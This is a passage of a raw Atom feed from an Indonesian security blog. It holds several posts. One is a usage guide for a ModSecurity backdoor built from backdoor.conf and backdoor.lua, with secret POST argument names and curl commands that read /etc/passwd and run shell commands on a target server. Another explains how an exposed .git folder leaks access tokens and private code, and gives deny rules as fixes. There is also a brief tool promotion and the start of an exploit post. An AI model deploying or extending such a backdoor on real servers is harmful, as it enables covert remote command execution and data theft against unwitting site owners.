POST).&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Prasyarat&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;ModSecurity dikompilasi dengan dukungan Lua&lt;/li&gt;&lt;li&gt;Lua&lt;/li&gt;&lt;li&gt;Arahan ModSecurity &lt;b&gt;&lt;i&gt;SecStreamOutBodyInspection&amp;nbsp;&lt;/i&gt;&lt;/b&gt;dan &lt;b&gt;&lt;i&gt;SecContentInjection&lt;/i&gt;&lt;/b&gt; diatur ke&lt;b&gt; On&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Instalasi&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dapatkan file &lt;b&gt;&lt;i&gt;backdoor.conf&lt;/i&gt;&lt;/b&gt; dan &lt;b&gt;&lt;i&gt;backdoor.lua&lt;/i&gt;&lt;/b&gt;&amp;nbsp;lalu muat yang pertama ke server web.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Konfigurasi&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Konfigurasi dapat dilakukan pada rule pertama di file &lt;b&gt;&lt;i&gt;backdoor.conf.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;blockquote&gt;tx.backdoor_file_argument_name&lt;/blockquote&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Pengaturan ini dapat digunakan untuk menetapkan nama argumen POST yang digunakan untuk mengambil konten file. Setel ke sesuatu yang acak seperti &lt;i&gt;&lt;b&gt;koomem6Shmog&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;blockquote&gt;tx.backdoor_command_argument_name&lt;/blockquote&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pengaturan ini dapat digunakan untuk menetapkan nama argumen POST yang digunakan untuk menjalankan perintah. Setel ke sesuatu yang acak seperti &lt;b&gt;&lt;i&gt;tys4Olhuibves&lt;/i&gt;&lt;/b&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Penggunaan&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Perintah dapat dijalankan di semua alamat (domain) di server target yang berada di belakang ModSecurity WAF. Keluaran dari perintah ditambahkan ke respons server standar.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;i&gt;Contoh penggunaan&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mengambil konten file:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;curl -X POST -d &quot;koomem6Shmog=/etc/passwd&quot; &quot;http://example.com/&quot;&lt;/blockquote&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Menjalankan perintah dan mendapatkan output:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;curl -X POST -d &quot;tys4Olhuibves=/bin/ps aux&quot; &quot;http://example.com/&quot;&lt;/blockquote&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/6123362941963403487'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/6123362941963403487'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/01/modsecurity-backdoor.html' title=' ModSecurity Backdoor'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ALMzIoiKuqn1BntFe4ycLwDlOrClNGWOsFcj4L9IgHfj3NExfXRqBJQh-8fd269qcAop9IvmQpZZyDQH48lsFdx9TjrMTnlix3YsmE1J9xK1XbkIvBvSqX5lssLJJx2Wj2Qe4UMc-GkFZwUoacNJaE0dPVcjCrFXL9feUxH5kOkNExq0Ig9sHeIj/s72-w640-h332-c/backdoor.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-970830985547336410</id><published>2023-01-09T11:02:00.006-08:00</published><updated>2023-04-05T07:36:39.906-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'>REST Attacker</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk2v9ybIPsypveO7eF8JonvX_3lWvA8BQiMzQjq6UtthPFM25c2E9KXYAFN-DU0GXqIaVVsIescOcYWd3rK1u6y0E4MN6W7dg2-FDEu71KeonSBmW1B6i8JSHMgNYA2zbMDXGErmLliydqSmUxH-73hsTBRvrhA1p1oG87IH9ZkPiDEXkEG8vVuHCd/s780/jenis-cyber-attack.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;520&quot; data-original-width=&quot;780&quot; height=&quot;426&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk2v9ybIPsypveO7eF8JonvX_3lWvA8BQiMzQjq6UtthPFM25c2E9KXYAFN-DU0GXqIaVVsIescOcYWd3rK1u6y0E4MN6W7dg2-FDEu71KeonSBmW1B6i8JSHMgNYA2zbMDXGErmLliydqSmUxH-73hsTBRvrhA1p1oG87IH9ZkPiDEXkEG8vVuHCd/w640-h426/jenis-cyber-attack.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Sumber &lt;b&gt;&lt;a href=&quot;https://github.com/xyber196/REST-Attacker&quot;&gt;Github&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;REST-Attacker adalah framework pengujian penetrasi otomatis untuk API yang mengikuti gaya arsitektur REST. Fokus alat ini adalah untuk menyederhanakan analisis implementasi REST API umum dengan mengotomatiskan sepenuhnya proses pengujian - termasuk pembuatan pengujian, penanganan kontrol akses, dan pembuatan laporan - dengan upaya konfigurasi yang minimal. Selain itu, REST-Attacker dirancang agar fleksibel dan dapat diperluas dengan dukungan untuk pengujian skala besar dan analisis terperinci.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;REST-Attacker dikelola oleh Ketua Keamanan Jaringan &amp;amp; Data Universitas &lt;a href=&quot;https://informatik.rub.de/nds/&quot;&gt;Ruhr Bochum.&lt;/a&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/970830985547336410'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/970830985547336410'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/01/rest-attacker.html' title='REST Attacker'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk2v9ybIPsypveO7eF8JonvX_3lWvA8BQiMzQjq6UtthPFM25c2E9KXYAFN-DU0GXqIaVVsIescOcYWd3rK1u6y0E4MN6W7dg2-FDEu71KeonSBmW1B6i8JSHMgNYA2zbMDXGErmLliydqSmUxH-73hsTBRvrhA1p1oG87IH9ZkPiDEXkEG8vVuHCd/s72-w640-h426-c/jenis-cyber-attack.webp" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-5365558758304854238</id><published>2023-01-06T08:59:00.005-08:00</published><updated>2023-04-05T07:36:18.129-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="git"/><title type='text'>Celah Keamanan .git</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMhzQQ5pfWMawqMgDduwH-VBzkBbKT5K6blaKqqJ-NTWBfNcBPAcn6jtOZG6oGmTXLy2UVZBMMG56wrWd_RYw_WfYS5ehWhlMYtijyfRpb5XMHecLQ_f2y_J18uodopg_lfQaSa58timxE0WOS2bGUaHW0YDdjUHGIr_TCpRvdS7vGSl9ri6ZJ56I6/s1200/1_cKaYfzjtBxmJDp6xWnvHTQ.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;750&quot; data-original-width=&quot;1200&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMhzQQ5pfWMawqMgDduwH-VBzkBbKT5K6blaKqqJ-NTWBfNcBPAcn6jtOZG6oGmTXLy2UVZBMMG56wrWd_RYw_WfYS5ehWhlMYtijyfRpb5XMHecLQ_f2y_J18uodopg_lfQaSa58timxE0WOS2bGUaHW0YDdjUHGIr_TCpRvdS7vGSl9ri6ZJ56I6/w640-h400/1_cKaYfzjtBxmJDp6xWnvHTQ.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;Git adalah sistem kontrol versi terdistribusi sumber terbuka yang paling populer. Jika Anda atau organisasi Anda menggunakan git untuk kode atau repositori, Anda harus mempertimbangkan paparan folder .git mungkin berisiko terhadap aset Anda. Beberapa situs web menghosting repositori kontrol versi mereka (misalnya, .git/ ) dalam produksi. Peretas dapat menggunakan alat untuk mengunduh/memulihkan repositori untuk mendapatkan akses ke kode sumber situs web Anda.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Apa itu folder .git?&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Folder .git adalah tempat git menyimpan semua metadatanya. Folder ini berisi informasi tentang semua komit, cabang, file, dan semua yang terkait dengan repositori git Anda.&lt;/p&gt;&lt;p&gt;Git adalah penyimpanan data nilai kunci sederhana. Direktori .git terlihat seperti ini：&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;config&lt;/p&gt;&lt;p&gt;description&lt;/p&gt;&lt;p&gt;HEAD&lt;/p&gt;&lt;p&gt;index&lt;/p&gt;&lt;p&gt;hooks/&lt;/p&gt;&lt;p&gt;info/&lt;/p&gt;&lt;p&gt;logs/&lt;/p&gt;&lt;p&gt;objects/&lt;/p&gt;&lt;p&gt;refs/&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Sebagai seorang peretas, mengapa Anda harus mengetahui folder git yang terbuka? Eksposur .git dapat membayar dengan baik atau tidak, tergantung pada aset yang ditemukan. Tapi tetap menarik karena:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Menganalisis kode sumber dapat mengungkap kerentanan lain yang lebih kritis.&lt;/li&gt;&lt;li&gt;Siapa pun dapat menggunakan kode sumber Anda untuk niat jahat, menyebabkan kerugian finansial/reputasi Anda&lt;/li&gt;&lt;li&gt;Menemukan file yang berisi informasi sensitif seperti kredensial, token, titik akhir baru, dll&lt;/li&gt;&lt;li&gt;Mudah dideteksi :P&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Folder .git terbuka&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Untuk memeriksa apakah folder .git aplikasi terbuka, buka direktori root, project.com , dan tambahkan /.git ke URL. Itu dapat menghasilkan hasil ini:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;404 Kesalahan: Ini berarti direktori .git aplikasi tidak tersedia untuk umum.&lt;/li&gt;&lt;li&gt;Kesalahan 403: Direktori .git tersedia di server, tetapi Anda tidak dapat mengakses root folder secara langsung.&lt;/li&gt;&lt;li&gt;Tanpa Kesalahan: Server merespons dengan pohon dokumen dari direktori .git, dan Anda dapat langsung menelusuri konten folder dan mengambil informasi apa pun.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Jika folder .git terbuka, Anda dapat dengan mudah mengakses konfigurasi yang akan terlihat seperti ini:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-cJ7ePAnRKzpGyNqg8-Rs8zpwHhKubLcALPzmURLmPM0U9wKhxrKvO2nOu7J-uW6Z9mMh3H6MR2nZv-nalwnlGXZy43CfoRK3PR17o2pH1RPk-oPeJXZXzszUpb5fBmXt9c2oF7StngcU8T1s0Mf0_W_60K6Tmm9rhjN1yTqOXauUl3B2MPEsNql2/s640/1_Xmf-Jtx9MN4pYB6fBEScFg.webp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;312&quot; data-original-width=&quot;640&quot; height=&quot;312&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-cJ7ePAnRKzpGyNqg8-Rs8zpwHhKubLcALPzmURLmPM0U9wKhxrKvO2nOu7J-uW6Z9mMh3H6MR2nZv-nalwnlGXZy43CfoRK3PR17o2pH1RPk-oPeJXZXzszUpb5fBmXt9c2oF7StngcU8T1s0Mf0_W_60K6Tmm9rhjN1yTqOXauUl3B2MPEsNql2/w640-h312/1_Xmf-Jtx9MN4pYB6fBEScFg.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Token Akses Pribadi GitHub&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Mulai 13 November 2020, GitHub tidak lagi menerima kata sandi akun saat mengautentikasi dengan REST API dan akan memerlukan autentikasi berbasis token (misalnya, akses pribadi, OAuth, atau token pemasangan Aplikasi GitHub) untuk semua operasi API yang diautentikasi di GitHub.com.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Perubahan ini telah memengaruhi akses git baris perintah reguler, dan pengembang harus mengonfigurasi klien GIT lokal dengan nama pengguna dan PAT (Personal Access Tokens / Token Akses Pribadi).&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Cara yang tepat untuk mengonfigurasi adalah menggunakan Git Credential Manager dengan perintah berikut:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;git config — global credential.helper store&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Tapi satu cara mudah untuk menangani konfigurasi adalah menambahkan nama pengguna dan token dengan URL repositori menggunakan perintah ini:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;git remote set-url origin https://&amp;lt;USERNAME&amp;gt;:&amp;lt;MYTOKEN&amp;gt;@github.com/username/project.git&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Exploitasi&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Produk memiliki folder .git mereka diekspos dari server API backend mereka yang juga konfigurasi PAT-nya dilakukan dengan salah mengekspos token sensitif.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL_MMuZiHGMCvRxAAAjcy5WwxDcju7xidntR8b-RFSVZB1ES7Uy1XmJspgW5WtjCJxaXE_JIIUkvLwNohNyrk1_YJCnpswpuwTKRCLGkZ8wlvCS2hW_Ty44szNsOEv2Uf1ETFeA8WQRccncbPOeO0-2-gnejGPRpbil-XMKzpgP4Pvc8lwk_JgZP7C/s640/1__yvQK0-tlNX4_lolDxCiow.webp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;312&quot; data-original-width=&quot;640&quot; height=&quot;312&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL_MMuZiHGMCvRxAAAjcy5WwxDcju7xidntR8b-RFSVZB1ES7Uy1XmJspgW5WtjCJxaXE_JIIUkvLwNohNyrk1_YJCnpswpuwTKRCLGkZ8wlvCS2hW_Ty44szNsOEv2Uf1ETFeA8WQRccncbPOeO0-2-gnejGPRpbil-XMKzpgP4Pvc8lwk_JgZP7C/w640-h312/1__yvQK0-tlNX4_lolDxCiow.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;Saya membuat folder git kosong secara lokal dan menyalin konfigurasi ke dalamnya. Sebuah `git pull` sederhana mengambil semua cabang dan kode. Repositori bersifat pribadi dan mengambil semua kode dan cabangnya, termasuk cabang produksi, merupakan kerentanan yang parah.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyeNXWPTcF_-7G9aqJvmqD4ZOEvbgyz2ikkajXEQY-l4hyhY5FOIocF0gYzmybIFrUKnJZPU1zlWaSSIwdICOrx_FSllviA2SoFGxEMB_7X00qXjr0leN6eoieizKdMrSupciX_6fk7nHWD34Plm_hXZgknF795lTInDxDBSgyYw-q6OXtaQXgoeLL/s640/1_L_HyCG3vCGwYx1JijusZgww.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;186&quot; data-original-width=&quot;640&quot; height=&quot;186&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyeNXWPTcF_-7G9aqJvmqD4ZOEvbgyz2ikkajXEQY-l4hyhY5FOIocF0gYzmybIFrUKnJZPU1zlWaSSIwdICOrx_FSllviA2SoFGxEMB_7X00qXjr0leN6eoieizKdMrSupciX_6fk7nHWD34Plm_hXZgknF795lTInDxDBSgyYw-q6OXtaQXgoeLL/w640-h186/1_L_HyCG3vCGwYx1JijusZgww.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Bagaimana cara memperbaiki Kerentanan Paparan Kode Sumber .git?&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Untuk memperbaiki kerentanan ini, hapus folder git dari server web Anda atau pastikan Anda menolak semua akses ke folder .git&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Apache&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&amp;lt;DirectoryMatch “^/.*/\.git/”&amp;gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Order deny,allow&amp;nbsp;&lt;/p&gt;&lt;p&gt;Deny from all&amp;nbsp;&lt;/p&gt;&lt;p&gt;&amp;lt;/DirectoryMatch&amp;gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Nginx&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Tambahkan ini di entri pertama di &lt;b&gt;server&lt;/b&gt;-block Anda di file &lt;b&gt;nginx.conf&lt;/b&gt;.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;location ~ /.git/ {&lt;/p&gt;&lt;p&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;deny all;&amp;nbsp;&lt;/p&gt;&lt;p&gt;}&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Lighttpd&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Tambahkan ini ke &lt;b&gt;lighttpd.conf&lt;/b&gt;.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;server.modules += ( &quot;mod_access&quot; )&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Setelah itu, kita dapat memblokir akses ke &lt;b&gt;.git&lt;/b&gt; folder tersebut&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;$HTTP[&quot;url&quot;] =~ &quot;^/\.git/&quot; {&lt;/p&gt;&lt;p&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; url.access-deny = (&quot;&quot;)&amp;nbsp;&lt;/p&gt;&lt;p&gt;}&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Saya harap artikel ini bermanfaat bagi Anda!&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5365558758304854238'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1191330060666792521/posts/default/5365558758304854238'/><link rel='alternate' type='text/html' href='https://xybernote.blogspot.com/2023/01/celah-keamanan-git.html' title='Celah Keamanan .git'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMhzQQ5pfWMawqMgDduwH-VBzkBbKT5K6blaKqqJ-NTWBfNcBPAcn6jtOZG6oGmTXLy2UVZBMMG56wrWd_RYw_WfYS5ehWhlMYtijyfRpb5XMHecLQ_f2y_J18uodopg_lfQaSa58timxE0WOS2bGUaHW0YDdjUHGIr_TCpRvdS7vGSl9ri6ZJ56I6/s72-w640-h400-c/1_cKaYfzjtBxmJDp6xWnvHTQ.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1191330060666792521.post-4428604165209444497</id><published>2023-01-05T08:51:00.004-08:00</published><updated>2023-04-05T07:35:49.286-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="xyber"/><title type='text'> Exploit code for CVE-2022-23087</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifhMaNxFxaSlFM6ThAJGixQKeMtUhTqKWbqj_Mj8ViPMPA6FleuWhB969Olh_K-vlCEOgaZvS84F9ijXGaqEbd09qPM7WISE8ItAcN7hj35_YeyhejmQI5utEEh1reAFWnSaEv51dYYvHD-DYhbVHsC96e-Fpil5-KpnGGWtgdE5iR3Bs_ko3JJldl/s800/SNWL-image-394-1.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;500&quot; data-original-width=&quot;800&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifhMaNxFxaSlFM6ThAJGixQKeMtUhTqKWbqj_Mj8ViPMPA6FleuWhB969Olh_K-vlCEOgaZvS84F9ijXGaqEbd09qPM7WISE8ItAcN7hj35_YeyhejmQI5utEEh1reAFWnSaEv51dYYvHD-DYhbVHsC96e-Fpil5-KpnGGWtgdE5iR3Bs_ko3JJldl/w640-h400/SNWL-image-394-1.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Windows ALPC Elevation of Privilege Vulnerability.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Module&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span&gt;&lt;b&gt;MakeFile&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;
